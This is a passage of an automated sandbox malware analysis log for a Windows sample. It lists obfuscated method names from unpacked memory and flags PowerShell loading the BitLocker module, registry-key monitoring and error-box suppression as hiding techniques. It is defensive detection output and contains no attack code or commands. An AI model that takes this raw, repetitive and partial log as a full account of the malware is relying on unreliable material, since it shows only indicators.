Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, vVt6wEQ8mT4XM4diZg.cs	High entropy of concatenated method names: 'ClCwTDJJKM', 'EK9wYjjCoO', 'BT4U7LwcW0', 'MslU5ruEou', 'yViUp9dunO', 'iYDUhZUOZY', 'iqJU3vMfWW', 'forUFp8S7h', 'M3aUxR2uBi', 'LOsUrW5uAb'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, amwXR0CPXsVauy8NYU.cs	High entropy of concatenated method names: 'xej427V6Wx', 'vK54cfaJKy', 'Wrr46KdAK3', 'csA4l8JLTw', 'IxM45M4UWh', 'Hlf4pCYPVn', 'Jhk43K60U4', 'n7W4FJ2g0g', 'hRT4rn5FeS', 'jtN4txLWE7'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, oU7Yibkb84IpiWUtkd.cs	High entropy of concatenated method names: 'yub0rrljC9', 'XBj0mDHsd1', 'GtJ0kVWXBl', 'HVS0iZIqiF', 'Vsx0l1ixll', 'oHL07QU8Gl', 'epX05solxG', 'Rfq0pccQkJ', 'U3U0hDrX0A', 'nMG03rtVaT'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, iGrKvbOUPHtmRDgSTJ.cs	High entropy of concatenated method names: 'agEVvngImu', 'PIfVJA4aDy', 'XpcV9xXeCa', 'cYlVEpUVI1', 'HMdVsuspcd', 'MjAVwYTieb', 'rkEVAAFx1C', 'hG6KS3vCZW', 'BXBKfy9c9e', 'VnWKMcoctd'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, BXplLTWfheod5WBiyg.cs	High entropy of concatenated method names: 'C20Hq9Hcea', 'in6HoWY1Ve', 'ToString', 'mwoHEmyxQy', 'vtrHsBKQwQ', 'Sv3HUS5hyB', 'LiSHwocv62', 'zPTHAJxt9l', 'ayrHG3hdk7', 'kkXH17fwkk'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, Nffji0ITJKe56hgjhg.cs	High entropy of concatenated method names: 'ToString', 'eqfjtSCq4s', 'Hvwjl0v4Jh', 'ywsj7bq0Ac', 'qDvj5MlPCt', 'zv3jpXEof8', 'BJujhFb0bW', 'zC9j3jelJL', 'pu5jFnG9P6', 'FP1jxBAWBQ'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, VTGJwXxvM7Ziv4PKG3.cs	High entropy of concatenated method names: 'bwLGPhyH4f', 'r0iGZb4V7x', 'RsoGLpDUXp', 'npTGgZC5vf', 'FXSGTg6wYe', 'u4AGdcJwvV', 'BaMGYDHCYX', 'fSfG2jlcJV', 'N5YGcprfQn', 'Cs5GQYEQ3k'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.2645004.3.raw.unpack, kD0JNdgNBriBGn5egS.cs	High entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.2645004.3.raw.unpack, QBy45BY4uMbUQs88Qq.cs	High entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.2638bc0.2.raw.unpack, kD0JNdgNBriBGn5egS.cs	High entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.2638bc0.2.raw.unpack, QBy45BY4uMbUQs88Qq.cs	High entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, D0OGH51qG7TrJUYkAK.cs	High entropy of concatenated method names: 'JR1JRG4y8a', 'vkKJELq1PC', 'l5sJs5sanZ', 'vc3JU9mP0w', 'udAJwk20H2', 'NVOJAsXNxk', 'vZrJGXjZpa', 'hOYJ1ONTlx', 'vkBJeFlcO3', 'UfHJqc9CV3'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, YqOlYl2eFwtfPkt21E.cs	High entropy of concatenated method names: 'zeuskKjA1L', 't6dsi7fBC6', 'HtBsISLSjw', 'IjpsWUhMnN', 'GbBsNlvb8J', 'MudsDxrVUJ', 'jrMsSOuYyZ', 'lxPsfYHPr4', 'FOasMfJJ1Z', 'PsVsOWW9qL'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, MhaIhDzaPUNsFfpULt.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BeHV4wgTlM', 'oqSV0vtKm2', 'FRCVj69MJH', 'I5bVHhfCuL', 'bGsVKaNcsB', 'yQ2VVSVK2Y', 'G6UVX46uPx'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, RqmCPZsVMMv5nbrMN6.cs	High entropy of concatenated method names: 'Dispose', 'TqEvMbYPBl', 'E1Dbl6QgMl', 'aLH9986UWT', 'fvIvOGDt4q', 'zpMvzXZpZX', 'ProcessDialogKey', 'fpCbuonY1J', 'u2Dbv8ygbK', 'QcGbbwGrKv'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, iNFWmT65K4oBOHdv97.cs	High entropy of concatenated method names: 'Wl4AR8MHHE', 'titAsqu8Kd', 'abTAwE5JMD', 'uogAGwP4vc', 'ujcA1qT3i8', 'eblwNEOGXG', 'm4uwDHFCio', 'QcSwS2rJtO', 'KaowfZguGr', 'ajXwMnqCsI'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, mdHoHt9MfgQhGOrMY7.cs	High entropy of concatenated method names: 'WFOvGqOlYl', 'lFwv1tfPkt', 'p3avqmmghX', 'wN9voE8Vt6', 'ndiv0ZgANF', 'TmTvj5K4oB', 'h2CgQ5y5XUUsiTJhmL', 'CZR8tK8FjhjBByWFCT', 'tSlvvtTwth', 'YalvJN7MuA'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, gkMdOYbUoH9rcjFeuZ.cs	High entropy of concatenated method names: 'd9wLtM8M4', 'Q0ug5PUUG', 'qIldgNNAC', 'bOQYR4RJA', 'jdec7qMwi', 'fwsQtawSe', 'q10rCeFp93vb3FnsYl', 'nAVdAUHX1OuFXTaYJ5', 'SReucDfU4e0o5OcQkW', 'hNbKyY2mW'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, PonY1JM82D8ygbKCcG.cs	High entropy of concatenated method names: 'n2LK6NIN2w', 'DPiKl4fHrB', 'K1sK72UjWb', 'Om9K5FsIXk', 'hkJKkFF2wb', 'YxtKpoI6uL', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, OOJ1Sjc3ammghXBN9E.cs	High entropy of concatenated method names: 'jy7UgP62MX', 'f3uUdagdZm', 'X4AU26DqcP', 'aysUcGwFIG', 'wbPU0hveJe', 'vEMUjDqhgi', 'ib2UH07rxZ', 'gHiUKaMWDi', 'GemUVCvHPy', 'X2wUXKmYVB'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, ChekuZ3HCIwSmN8ZNP.cs	High entropy of concatenated method names: 'agrGEhicPZ', 'FydGUJrVl5', 'cK2GA3q7rS', 'DAqAOVF3Jn', 'VtcAzxQMXs', 'cCAGunM6aN', 'AtFGvEHcbJ', 'EkQGb7xa9e', 'ncEGJrZ37u', 'eyuG9aSySR'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, LDBvEBvJJ3O33kFquaV.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Xi4XkqBNKI', 'Y2bXiB2U7k', 'FOxXIZQaM5', 'KamXW2Gu9D', 'IHvXN21gAX', 'KGtXDVUCTG', 'LdkXS8cZvG'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, ySkLlbvukfHRnCTtESI.cs	High entropy of concatenated method names: 'gLXVP5FDHj', 'aSkVZK37or', 'HG7VLuGtTa', 'soAVgBft2a', 'PtRVTjr7Id', 'rHaVdWW1jN', 'QjgVYcgLJ3', 'OmiV2hkTWw', 'Y55Vc8phEb', 'B2CVQTE6FE'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, aIGDt4fqLpMXZpZXEp.cs	High entropy of concatenated method names: 'SUAKEhmXdr', 'eHCKsVIEDR', 'SuuKUxDlwg', 'yRMKwgOGM8', 'xdlKA6pPcH', 'T94KG2yKTT', 'GjLK1KBe6N', 'ABlKejwfBe', 'bvaKqUYxLT', 'tDuKo8ou3Q'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, vVt6wEQ8mT4XM4diZg.cs	High entropy of concatenated method names: 'ClCwTDJJKM', 'EK9wYjjCoO', 'BT4U7LwcW0', 'MslU5ruEou', 'yViUp9dunO', 'iYDUhZUOZY', 'iqJU3vMfWW', 'forUFp8S7h', 'M3aUxR2uBi', 'LOsUrW5uAb'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, amwXR0CPXsVauy8NYU.cs	High entropy of concatenated method names: 'xej427V6Wx', 'vK54cfaJKy', 'Wrr46KdAK3', 'csA4l8JLTw', 'IxM45M4UWh', 'Hlf4pCYPVn', 'Jhk43K60U4', 'n7W4FJ2g0g', 'hRT4rn5FeS', 'jtN4txLWE7'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, oU7Yibkb84IpiWUtkd.cs	High entropy of concatenated method names: 'yub0rrljC9', 'XBj0mDHsd1', 'GtJ0kVWXBl', 'HVS0iZIqiF', 'Vsx0l1ixll', 'oHL07QU8Gl', 'epX05solxG', 'Rfq0pccQkJ', 'U3U0hDrX0A', 'nMG03rtVaT'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, iGrKvbOUPHtmRDgSTJ.cs	High entropy of concatenated method names: 'agEVvngImu', 'PIfVJA4aDy', 'XpcV9xXeCa', 'cYlVEpUVI1', 'HMdVsuspcd', 'MjAVwYTieb', 'rkEVAAFx1C', 'hG6KS3vCZW', 'BXBKfy9c9e', 'VnWKMcoctd'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, BXplLTWfheod5WBiyg.cs	High entropy of concatenated method names: 'C20Hq9Hcea', 'in6HoWY1Ve', 'ToString', 'mwoHEmyxQy', 'vtrHsBKQwQ', 'Sv3HUS5hyB', 'LiSHwocv62', 'zPTHAJxt9l', 'ayrHG3hdk7', 'kkXH17fwkk'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, Nffji0ITJKe56hgjhg.cs	High entropy of concatenated method names: 'ToString', 'eqfjtSCq4s', 'Hvwjl0v4Jh', 'ywsj7bq0Ac', 'qDvj5MlPCt', 'zv3jpXEof8', 'BJujhFb0bW', 'zC9j3jelJL', 'pu5jFnG9P6', 'FP1jxBAWBQ'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, VTGJwXxvM7Ziv4PKG3.cs	High entropy of concatenated method names: 'bwLGPhyH4f', 'r0iGZb4V7x', 'RsoGLpDUXp', 'npTGgZC5vf', 'FXSGTg6wYe', 'u4AGdcJwvV', 'BaMGYDHCYX', 'fSfG2jlcJV', 'N5YGcprfQn', 'Cs5GQYEQ3k'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, D0OGH51qG7TrJUYkAK.cs	High entropy of concatenated method names: 'JR1JRG4y8a', 'vkKJELq1PC', 'l5sJs5sanZ', 'vc3JU9mP0w', 'udAJwk20H2', 'NVOJAsXNxk', 'vZrJGXjZpa', 'hOYJ1ONTlx', 'vkBJeFlcO3', 'UfHJqc9CV3'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, YqOlYl2eFwtfPkt21E.cs	High entropy of concatenated method names: 'zeuskKjA1L', 't6dsi7fBC6', 'HtBsISLSjw', 'IjpsWUhMnN', 'GbBsNlvb8J', 'MudsDxrVUJ', 'jrMsSOuYyZ', 'lxPsfYHPr4', 'FOasMfJJ1Z', 'PsVsOWW9qL'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, MhaIhDzaPUNsFfpULt.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BeHV4wgTlM', 'oqSV0vtKm2', 'FRCVj69MJH', 'I5bVHhfCuL', 'bGsVKaNcsB', 'yQ2VVSVK2Y', 'G6UVX46uPx'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, RqmCPZsVMMv5nbrMN6.cs	High entropy of concatenated method names: 'Dispose', 'TqEvMbYPBl', 'E1Dbl6QgMl', 'aLH9986UWT', 'fvIvOGDt4q', 'zpMvzXZpZX', 'ProcessDialogKey', 'fpCbuonY1J', 'u2Dbv8ygbK', 'QcGbbwGrKv'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, iNFWmT65K4oBOHdv97.cs	High entropy of concatenated method names: 'Wl4AR8MHHE', 'titAsqu8Kd', 'abTAwE5JMD', 'uogAGwP4vc', 'ujcA1qT3i8', 'eblwNEOGXG', 'm4uwDHFCio', 'QcSwS2rJtO', 'KaowfZguGr', 'ajXwMnqCsI'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, mdHoHt9MfgQhGOrMY7.cs	High entropy of concatenated method names: 'WFOvGqOlYl', 'lFwv1tfPkt', 'p3avqmmghX', 'wN9voE8Vt6', 'ndiv0ZgANF', 'TmTvj5K4oB', 'h2CgQ5y5XUUsiTJhmL', 'CZR8tK8FjhjBByWFCT', 'tSlvvtTwth', 'YalvJN7MuA'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, gkMdOYbUoH9rcjFeuZ.cs	High entropy of concatenated method names: 'd9wLtM8M4', 'Q0ug5PUUG', 'qIldgNNAC', 'bOQYR4RJA', 'jdec7qMwi', 'fwsQtawSe', 'q10rCeFp93vb3FnsYl', 'nAVdAUHX1OuFXTaYJ5', 'SReucDfU4e0o5OcQkW', 'hNbKyY2mW'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, PonY1JM82D8ygbKCcG.cs	High entropy of concatenated method names: 'n2LK6NIN2w', 'DPiKl4fHrB', 'K1sK72UjWb', 'Om9K5FsIXk', 'hkJKkFF2wb', 'YxtKpoI6uL', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, OOJ1Sjc3ammghXBN9E.cs	High entropy of concatenated method names: 'jy7UgP62MX', 'f3uUdagdZm', 'X4AU26DqcP', 'aysUcGwFIG', 'wbPU0hveJe', 'vEMUjDqhgi', 'ib2UH07rxZ', 'gHiUKaMWDi', 'GemUVCvHPy', 'X2wUXKmYVB'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, ChekuZ3HCIwSmN8ZNP.cs	High entropy of concatenated method names: 'agrGEhicPZ', 'FydGUJrVl5', 'cK2GA3q7rS', 'DAqAOVF3Jn', 'VtcAzxQMXs', 'cCAGunM6aN', 'AtFGvEHcbJ', 'EkQGb7xa9e', 'ncEGJrZ37u', 'eyuG9aSySR'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, LDBvEBvJJ3O33kFquaV.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Xi4XkqBNKI', 'Y2bXiB2U7k', 'FOxXIZQaM5', 'KamXW2Gu9D', 'IHvXN21gAX', 'KGtXDVUCTG', 'LdkXS8cZvG'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, ySkLlbvukfHRnCTtESI.cs	High entropy of concatenated method names: 'gLXVP5FDHj', 'aSkVZK37or', 'HG7VLuGtTa', 'soAVgBft2a', 'PtRVTjr7Id', 'rHaVdWW1jN', 'QjgVYcgLJ3', 'OmiV2hkTWw', 'Y55Vc8phEb', 'B2CVQTE6FE'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, aIGDt4fqLpMXZpZXEp.cs	High entropy of concatenated method names: 'SUAKEhmXdr', 'eHCKsVIEDR', 'SuuKUxDlwg', 'yRMKwgOGM8', 'xdlKA6pPcH', 'T94KG2yKTT', 'GjLK1KBe6N', 'ABlKejwfBe', 'bvaKqUYxLT', 'tDuKo8ou3Q'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, vVt6wEQ8mT4XM4diZg.cs	High entropy of concatenated method names: 'ClCwTDJJKM', 'EK9wYjjCoO', 'BT4U7LwcW0', 'MslU5ruEou', 'yViUp9dunO', 'iYDUhZUOZY', 'iqJU3vMfWW', 'forUFp8S7h', 'M3aUxR2uBi', 'LOsUrW5uAb'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, amwXR0CPXsVauy8NYU.cs	High entropy of concatenated method names: 'xej427V6Wx', 'vK54cfaJKy', 'Wrr46KdAK3', 'csA4l8JLTw', 'IxM45M4UWh', 'Hlf4pCYPVn', 'Jhk43K60U4', 'n7W4FJ2g0g', 'hRT4rn5FeS', 'jtN4txLWE7'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, oU7Yibkb84IpiWUtkd.cs	High entropy of concatenated method names: 'yub0rrljC9', 'XBj0mDHsd1', 'GtJ0kVWXBl', 'HVS0iZIqiF', 'Vsx0l1ixll', 'oHL07QU8Gl', 'epX05solxG', 'Rfq0pccQkJ', 'U3U0hDrX0A', 'nMG03rtVaT'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, iGrKvbOUPHtmRDgSTJ.cs	High entropy of concatenated method names: 'agEVvngImu', 'PIfVJA4aDy', 'XpcV9xXeCa', 'cYlVEpUVI1', 'HMdVsuspcd', 'MjAVwYTieb', 'rkEVAAFx1C', 'hG6KS3vCZW', 'BXBKfy9c9e', 'VnWKMcoctd'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, BXplLTWfheod5WBiyg.cs	High entropy of concatenated method names: 'C20Hq9Hcea', 'in6HoWY1Ve', 'ToString', 'mwoHEmyxQy', 'vtrHsBKQwQ', 'Sv3HUS5hyB', 'LiSHwocv62', 'zPTHAJxt9l', 'ayrHG3hdk7', 'kkXH17fwkk'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, Nffji0ITJKe56hgjhg.cs	High entropy of concatenated method names: 'ToString', 'eqfjtSCq4s', 'Hvwjl0v4Jh', 'ywsj7bq0Ac', 'qDvj5MlPCt', 'zv3jpXEof8', 'BJujhFb0bW', 'zC9j3jelJL', 'pu5jFnG9P6', 'FP1jxBAWBQ'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, VTGJwXxvM7Ziv4PKG3.cs	High entropy of concatenated method names: 'bwLGPhyH4f', 'r0iGZb4V7x', 'RsoGLpDUXp', 'npTGgZC5vf', 'FXSGTg6wYe', 'u4AGdcJwvV', 'BaMGYDHCYX', 'fSfG2jlcJV', 'N5YGcprfQn', 'Cs5GQYEQ3k'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6870000.6.raw.unpack, kD0JNdgNBriBGn5egS.cs	High entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6870000.6.raw.unpack, QBy45BY4uMbUQs88Qq.cs	High entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
